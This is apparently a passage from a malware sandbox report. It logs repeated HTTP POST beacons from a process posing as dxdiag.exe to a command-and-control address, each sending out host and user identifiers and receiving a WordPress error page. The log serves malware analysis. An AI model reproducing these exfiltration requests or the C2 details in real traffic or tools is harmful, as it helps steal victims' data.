                      Oct 1, 2024 07:45:24.487509012 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:24.487546921 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.749727137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:24.637676001 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:24.642575026 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:27.380917072 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:25 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:27.380938053 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:27.380949974 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.749728137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:27.914257050 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:27.919112921 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:30.517452955 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:28 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:30.517477036 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:30.517493963 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.749729137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:30.959280968 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:30.964237928 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:33.616653919 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:31 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:33.616673946 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:33.616687059 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.749730137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:33.760596037 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:33.769110918 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:36.504873037 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:34 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:36.504893064 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:36.504905939 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.749731137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:36.655199051 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:36.660144091 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:39.222791910 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:37 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:39.222815037 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:39.222826004 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.749732137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:39.372468948 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:39.377389908 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:42.347677946 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:40 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
